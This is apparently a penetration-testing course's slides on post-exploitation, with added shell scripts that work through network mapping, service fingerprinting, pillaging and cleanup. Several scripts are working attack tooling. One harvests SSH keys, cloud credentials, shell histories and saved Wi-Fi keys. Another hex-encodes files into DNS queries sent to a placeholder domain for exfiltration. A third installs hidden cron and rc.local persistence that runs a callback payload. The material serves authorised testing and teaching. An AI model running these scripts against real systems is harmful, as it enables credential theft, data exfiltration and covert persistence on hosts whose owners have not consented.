Hacking Techniques & Intrusion Detection Ali Al-Shemery arabnix [at] gmail.

All materials are licensed under a Creative Commons “Share Alike” license.

# whoami
Ali Al-Shemery. Ph.D., M.Sc., and B.Sc., Jordan. More than 14 years of technical background (mainly Linux/Unix and infosec). Technical instructor for more than 10 years (infosec and Linux courses). Hold more than 15 well-known technical certificates. Infosec and Linux are my main interests.

Post-Exploitation: “Shell is Only the Beginning” (Darkoperator)

Outline
– Why Post-Exploitation
– Post-Exploitation RoE
– Infrastructure Analysis
– Pillaging
– Sensitive Data
– User Information
– System Configurations
– High Value/Profile Targets
– Data Exfiltration
– Persistence
– Cleanup

Why?
Determine the value of the compromised machine and maintain control of it for later use. Its value depends on the sensitivity of the data it holds and on how useful it is for further compromising the network. Post-exploitation helps identify and document:
– sensitive data,
– configuration settings,
– communication channels,
– relationships with other network devices.
It goes beyond exploit verification: it shows how vulnerabilities can be chained to gain a higher level of access (real-life attacks!).

Post-Exploitation Rules of Engagement (RoE)
– Protect the client.
– Protect yourself.

Infrastructure Analysis

Network Configuration
– Interfaces
– Routing
– DNS servers
– Proxy servers (network and application level)
– ARP table

Network Services
– Listening services (TCP, UDP, etc.)
– VPN connections
– Directory services
– Neighbors
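The two slides above are a checklist; the script below, an added example that is not part of the original slides, turns it into a first-pass collector for a compromised Linux host. It uses only tools normally already present (iproute2 with net-tools fallbacks) and, for the listening-services part, reduces `ss -tulnp` output to the sockets a neighbour on the network can actually reach. The `ss` lines embedded in the script are a constructed sample, not a capture from a real host.

```sh
#!/bin/sh
# Added example, not from the slides: first-pass network picture of a compromised
# Linux host using tools that are normally already on the box. Each collector
# falls back to the legacy net-tools command when the iproute2 one is missing.

collect_net_config() {
  echo "## interfaces"; ip -br addr 2>/dev/null || ifconfig -a 2>/dev/null
  echo "## routes";     ip route 2>/dev/null    || netstat -rn 2>/dev/null
  echo "## dns";        grep -E '^(nameserver|search|domain)' /etc/resolv.conf 2>/dev/null
  echo "## proxy";      env | grep -iE '^(https?|ftp|no)_proxy='; cat /etc/apt/apt.conf.d/*proxy* 2>/dev/null
  echo "## arp";        ip neigh 2>/dev/null    || arp -an 2>/dev/null
  echo "## tunnels";    ip -br link 2>/dev/null | grep -E '^(tun|tap|wg|ppp|ipsec)'
  echo "## listeners";  ss -tulnp 2>/dev/null   || netstat -tulnp 2>/dev/null
  return 0
}

# Reduce `ss -tulnp` (or the constructed sample below) to "proto port process" for
# sockets bound to every interface, i.e. the services a neighbour can reach.
# Loopback-only listeners are dropped: they matter for local privilege escalation,
# not for the lateral-movement picture.
parse_listeners() {
  awk 'NR > 1 {
    n = split($5, a, ":"); port = a[n]
    addr = substr($5, 1, length($5) - length(port) - 1)
    if (addr == "0.0.0.0" || addr == "*" || addr == "[::]") {
      proc = "-"
      if (match($0, /users:\(\("[^"]+"/)) proc = substr($0, RSTART + 9, RLENGTH - 10)
      print $1, port, proc
    }
  }'
}

# Constructed sample of ss output (not captured from a real host).
SAMPLE_SS='Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
tcp   LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=812,fd=3))
tcp   LISTEN 0      80     127.0.0.1:3306     0.0.0.0:*         users:(("mysqld",pid=1044,fd=21))
tcp   LISTEN 0      511    *:80               *:*               users:(("nginx",pid=1201,fd=6))
udp   UNCONN 0      0      0.0.0.0:161        0.0.0.0:*         users:(("snmpd",pid=930,fd=7))
tcp   LISTEN 0      128    [::]:22            [::]:*            users:(("sshd",pid=812,fd=4))'

if [ "${1:-}" = "--live" ]; then
  collect_net_config                             # full dump on the real host
else
  printf '%s\n' "$SAMPLE_SS" | parse_listeners   # offline demo on the sample
fi
```

Run it with `--live` on the target for the full dump, or pipe real `ss -tulnp` output into `parse_listeners`. The MySQL listener on 127.0.0.1 is deliberately filtered out of the reachable list; it still belongs in the pillaging notes, just not in the lateral-movement map.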

Pillaging
Obtaining information from the targeted hosts:
– files containing personal information,
– credit card information,
– passwords, etc.
This either satisfies the goals of the test or is part of the pivoting process. The location of this data varies with the type of data, so knowledge of commonly used applications, server software and middleware is very important. Special tools may be necessary to obtain, extract or read the targeted data from some systems.

What to check: installed software and installed services
– Security services
– File/printer shares
– Database servers
– Directory servers
– Name servers
– Deployment services
– Certificate authority
– Source code management server
– Dynamic Host Configuration server
– Virtualization
– Messaging
– Monitoring and management
– Backup systems
– Others, please add…
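As an added example (not from the slides), the script below maps the checklist onto a Linux host: a table of role-revealing paths is tested against a root prefix, so the same function works on the live system, on a mounted disk image, or on a scratch tree for rehearsal. The marker table is illustrative and should be extended per engagement; the package and unit listing covers the Debian and RPM families.

```sh
#!/bin/sh
# Added example, not from the slides: map role-revealing files on a host to the
# service categories on the checklist, then list what is installed and enabled.
# ROOT is a prefix (default /) so the same function can run against a mounted
# image or a scratch tree. The marker table is illustrative, not exhaustive.

SERVICE_MARKERS='etc/exports|File share (NFS)
etc/samba/smb.conf|File share (SMB)
etc/cups/cupsd.conf|Printer share (CUPS)
etc/mysql|Database server (MySQL/MariaDB)
etc/postgresql|Database server (PostgreSQL)
etc/ldap/slapd.d|Directory server (OpenLDAP)
etc/bind|Name server (BIND)
etc/dhcp/dhcpd.conf|DHCP server
etc/pki/CA|Certificate authority (OpenSSL CA tree)
etc/gitlab|Source code management (GitLab)
etc/libvirt|Virtualization (libvirt)
etc/postfix|Messaging (Postfix)
etc/zabbix|Monitoring (Zabbix)
etc/nagios|Monitoring (Nagios)
etc/bacula|Backup (Bacula)
etc/snmp/snmpd.conf|Management (SNMP agent)
etc/cobbler|Deployment services (Cobbler)
etc/audit/auditd.conf|Security service (auditd)
etc/clamav|Security service (ClamAV)'

# Print "category: path" for every marker that exists under ROOT.
fingerprint_services() {
  root="${1:-/}"
  printf '%s\n' "$SERVICE_MARKERS" | while IFS='|' read -r path category; do
    [ -e "$root/$path" ] && printf '%s: %s/%s\n' "$category" "$root" "$path"
  done
  return 0
}

# Package and unit inventory of the live host (Debian or RPM family).
list_installed() {
  echo "## packages"
  if command -v dpkg >/dev/null 2>&1; then dpkg -l | awk '/^ii/ { print $2 }'
  elif command -v rpm >/dev/null 2>&1; then rpm -qa
  fi
  echo "## enabled units"
  if command -v systemctl >/dev/null 2>&1; then systemctl list-unit-files --state=enabled --no-legend
  else ls /etc/init.d 2>/dev/null
  fi
}

if [ "${1:-}" = "--live" ]; then fingerprint_services /; list_installed; fi
```

A hit on the marker table is a lead, not proof: confirm with the listener map and the enabled-unit list, since a leftover config directory from a removed package looks the same on disk.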

Sensitive Data
– Key-logging
– Screen capture
– Network traffic capture
– Previous audit reports (lucky day!)

User Information
– On the system
– Web browsers
– IM clients

System Configuration
– Password policy
– Security policies
– Configured Wi-Fi networks and keys
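The three slides above say what to look for; the script below, an added example that is not part of the original slides, shows where it usually sits on a Linux host and collects it in one pass: shell histories and credential files under each home directory, saved Wi-Fi profiles with their keys (NetworkManager keyfiles and wpa_supplicant), the password-ageing policy from login.defs, and config files containing credential-looking keys. It takes a root prefix so it can be run on a scratch tree; the GNU grep options (`-r`, `--include`) are assumed.

```sh
#!/bin/sh
# Added example, not from the slides: hunt the user and system locations named on
# the previous three slides. ROOT defaults to / and may point at a scratch tree.
# Output is tab-separated: kind, path, detail. Assumes GNU grep.

hunt_sensitive() {
  root="${1:-/}"
  # 1. Shell histories and well-known credential files under every home directory
  for home in "$root"/root "$root"/home/*; do
    [ -d "$home" ] || continue
    for f in .bash_history .zsh_history .mysql_history .netrc .git-credentials \
             .ssh/id_rsa .ssh/id_ed25519 .aws/credentials .docker/config.json .kube/config; do
      [ -f "$home/$f" ] || continue
      case "$f" in
        *history) detail="$(grep -cE -- '-p[^[:space:]]|passw|secret|token' "$home/$f" || true) credential-looking lines" ;;
        *)        detail="$(wc -c < "$home/$f" | tr -d ' ') bytes" ;;
      esac
      printf 'user-file\t%s\t%s\n' "$home/$f" "$detail"
    done
  done
  # 2. Saved Wi-Fi profiles: NetworkManager keyfiles and wpa_supplicant configs
  for f in "$root"/etc/NetworkManager/system-connections/* "$root"/etc/wpa_supplicant/*.conf; do
    [ -f "$f" ] || continue
    ssid="$(grep -m1 -E '^[[:space:]]*ssid=' "$f" | cut -d= -f2- | tr -d '"')"
    key="$(grep -m1 -E '^[[:space:]]*(psk|wep-key0)=' "$f" | cut -d= -f2- | tr -d '"')"
    printf 'wifi\t%s\tssid=%s psk=%s\n' "$f" "$ssid" "${key:-<none>}"
  done
  # 3. Password-ageing policy
  if [ -f "$root/etc/login.defs" ]; then
    grep -E '^(PASS_MAX_DAYS|PASS_MIN_LEN|PASS_WARN_AGE)' "$root/etc/login.defs" |
      awk -v f="$root/etc/login.defs" '{ printf "policy\t%s\t%s=%s\n", f, $1, $2 }'
  fi
  # 4. Credential-looking keys in application and service configuration
  pat='(password|passwd|secret|api[_-]?key)[[:space:]]*[=:]'
  grep -rIlE --include='*.conf' --include='*.cfg' --include='*.ini' --include='*.env' \
       --include='*.yml' --include='*.yaml' -i "$pat" "$root/etc" "$root/opt" "$root/var/www" 2>/dev/null |
    while read -r f; do
      printf 'config-secret\t%s\t%s hits\n' "$f" "$(grep -ciE "$pat" "$f")"
    done
  return 0
}

if [ "${1:-}" = "--live" ]; then hunt_sensitive /; fi
```

Everything this prints is client data: per the RoE slide it goes straight into encrypted evidence, and the Wi-Fi keys in particular should never be pasted into tickets or chat.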

High Value/Profile Targets
Can be identified and expanded from the targets agreed in the pre-engagement meetings through the analysis of:
– the data gathered,
– the interactions of those systems,
– the services they run.
This view of how these high-value/profile targets operate and interact helps in identifying and measuring the impact an attacker could have on the business, due to the data and processes involved, and on the overall integrity of the client’s infrastructure and services.

Data Exfiltration
– Mapping all possible exfiltration paths
– Testing exfiltration paths
– Measuring control strengths
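As an added example (not from the slides), the script below does the three steps on a Linux host: it probes which egress channels are actually open, shapes a file into DNS query names so the DNS path can be exercised, and reports how many queries the file costs, which is the number a detection control would have to notice. `EXFIL_HOST` and `EXFIL_DOMAIN` are assumed names for infrastructure the tester controls; nothing leaves the host unless the probe or send functions are invoked explicitly.

```sh
#!/bin/sh
# Added example, not from the slides: (1) probe which egress channels a host really
# has, (2) shape a file into DNS query names so the DNS path can be exercised and its
# cost measured. EXFIL_HOST and EXFIL_DOMAIN are assumed names for infrastructure the
# tester controls; nothing leaves the host unless the probe/send functions are called.

EXFIL_HOST="${EXFIL_HOST:-exfil.example.net}"   # assumed tester-controlled web/ping host
EXFIL_DOMAIN="${EXFIL_DOMAIN:-x.example.net}"   # assumed zone whose authoritative server the tester runs

# Try each channel with a short timeout. "open" for DNS only means a resolver answered;
# the real evidence is the query showing up in the tester's authoritative server log.
probe_exfil_paths() {
  printf 'https/443: '; curl -s -m 5 -o /dev/null "https://$EXFIL_HOST/" && echo open || echo blocked
  printf 'http/80  : '; curl -s -m 5 -o /dev/null "http://$EXFIL_HOST/"  && echo open || echo blocked
  printf 'dns      : '; dig +short +time=3 +tries=1 "probe.$EXFIL_DOMAIN" >/dev/null 2>&1 && echo open || echo blocked
  printf 'icmp     : '; ping -c 1 -W 2 "$EXFIL_HOST" >/dev/null 2>&1 && echo open || echo blocked
}

# Hex-encode FILE and cut it into 60-character labels, one query name per line:
# <seq>.<chunk>.<EXFIL_DOMAIN>. 60 stays under the 63-byte label limit and keeps the
# whole name under 253 bytes for any sane domain; the sequence number lets the
# receiver reorder queries that arrive out of order.
dns_chunks() {
  od -An -v -tx1 "$1" | tr -d ' \n' | fold -w 60 |
    awk -v d="$EXFIL_DOMAIN" '{ printf "%d.%s.%s\n", NR - 1, $0, d }'
}

# Issue the queries at a fixed rate so the volume is measurable on the blue-team side.
dns_send() {
  dns_chunks "$1" | while read -r name; do
    dig +short +time=3 +tries=1 "$name" >/dev/null 2>&1
    sleep "${2:-1}"
  done
}

# Cost of the DNS path for FILE: number of queries needed (two hex chars per byte).
dns_query_count() { dns_chunks "$1" | wc -l | tr -d ' '; }

case "${1:-}" in
  --probe) probe_exfil_paths ;;
  --send)  dns_send "$2" "${3:-1}" ;;
esac
```

Hex doubles the size, so a 1 MiB file needs roughly 35,000 queries; that ratio, together with the rate you send at, is the measurable "control strength" figure for the report: either the resolver logs and the egress DNS monitoring flagged it, or they did not.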

Persistence
– Autostart malware
– Reverse connections
– Rootkits: user mode, kernel based
– C&C medium (HTTP, DNS, TCP, ICMP)
– Backdoors
– VPN with credentials

Diving Further (Infrastructure)
From the compromised system:
– upload tools or use local system tools,
– ARP scan,
– sweeping,
– DNS enumeration,
– directory services enumeration,
– brute force,
– execute further exploits.
Through the compromised system:
– port forwarding,
– proxy,
– VPN,
– execute further exploits.

Cleanup
The process of cleaning the system after completing the penetration test:
– user accounts: connect-back users,
– binaries installed: executables, scripts, backdoors, rootkits, etc.,
– temp files.
Restore original configuration settings if they were modified. Leave no trace. Properly archive and encrypt the evidence to be handed back to the customer.
Note: ensure the steps of exploitation are documented.
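The Persistence and Cleanup slides are two halves of one obligation: everything dropped for persistence must be reversible. The script below, an added example that is not part of the original slides, ties them together for a Linux host. Each artefact (a dropped helper script, a cron autostart entry, an appended line in rc.local) is written to a manifest as it is created, and the cleanup function replays the manifest in reverse, restoring backed-up originals with their timestamps. The root-prefix argument lets the whole flow be rehearsed in a scratch tree; the payload string is an assumed placeholder for the tester's callback command, and the file names are assumptions too.

```sh
#!/bin/sh
# Added example, not from the slides: record every persistence artefact in a
# manifest as it is created, so the cleanup step can reverse it mechanically and
# the manifest itself becomes evidence for the report. ROOT is a prefix (empty for
# the real filesystem) so the flow can be rehearsed in a scratch tree; the payload
# argument is an assumed placeholder for the tester's callback command.

manifest_path() { printf '%s/var/tmp/.pt-manifest\n' "$1"; }

record() { printf '%s\n' "$2" >> "$(manifest_path "$1")"; }

# pt_install ROOT PAYLOAD: drop a helper script, start it from cron, and append to
# rc.local (backing it up first). Each step is recorded as file|path or mod|path|backup.
pt_install() {
  root="$1"; payload="$2"
  mkdir -p "$root/var/tmp" "$root/etc/cron.d" "$root/usr/local/bin"
  helper="$root/usr/local/bin/.cache-helper"
  printf '#!/bin/sh\n%s\n' "$payload" > "$helper"
  chmod 755 "$helper"
  record "$root" "file|$helper"
  printf '*/10 * * * * root /usr/local/bin/.cache-helper\n' > "$root/etc/cron.d/cache-helper"
  record "$root" "file|$root/etc/cron.d/cache-helper"
  if [ -f "$root/etc/rc.local" ]; then
    cp -p "$root/etc/rc.local" "$root/var/tmp/.rc.local.orig"
    record "$root" "mod|$root/etc/rc.local|$root/var/tmp/.rc.local.orig"
    printf '/usr/local/bin/.cache-helper &\n' >> "$root/etc/rc.local"
  fi
  # An account created for connect-back would be recorded as "user|name" the same way.
}

# pt_cleanup ROOT: print the manifest (keep it with the evidence), then undo every
# entry in reverse order and remove the manifest itself.
pt_cleanup() {
  root="$1"; m="$(manifest_path "$root")"
  [ -f "$m" ] || { echo "no manifest under '$root'" >&2; return 1; }
  cat "$m"
  sed '1!G;h;$!d' "$m" | while IFS='|' read -r kind path extra; do   # sed idiom reverses the lines
    case "$kind" in
      file) rm -f "$path" ;;
      mod)  mv -f "$extra" "$path" ;;                 # restores content and mtime of the original
      user) [ -z "$root" ] && userdel -r "$path" ;;   # only meaningful on the real filesystem
    esac
  done
  rm -f "$m"
}
```

Restoring the backup with `mv` brings back the original content and mtime, but the ctime still changes and package managers or file-integrity monitors may still record the edit, so "leave no trace" is about removing the tester's artefacts and restoring behaviour, not about defeating the client's own audit trail; the printed manifest is what goes into the report as the record of what was changed.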

Special Thanks to the Penetration Testing Execution Standard (PTES) Team …

Summary
– Explained what post-exploitation is and why it is needed.
– The need to check the Post-Exploitation RoE.
– What we mean by Infrastructure Analysis.
– What Pillaging is.
– What Sensitive Data is, and how to identify it.
– What User Information we need to gather.
– What System Configurations are, and where to check for them.
– Explained what a High Value/Profile Target is, and what business impact it could lead to if compromised.
– What we mean by Data Exfiltration.
– What Persistence is, and methods to perform it.
– What the Cleanup phase is, and why it is necessary.

References
– Penetration Testing Execution Standard, …standard.org/index.php/Main_Page
– Linux/Unix/BSD Post-Exploitation Command List, …NMH034VDM-1N-EWPRz2770K4/edit?pli=1
– Windows Post-Exploitation Command List, …K1WHTJm4fgG3joiuz43rw/edit?pli=1
– OSX Post-Exploitation, …SO1K-24VVYnulUD2x3rJD3k/edit?pli=1
– Metasploit Post Exploitation Command List, …F2m3nIPEA_kekqqqA2Ywto/edit?pli=1
– Post-Exploitation Command List, …command-lists-request-to-edit.html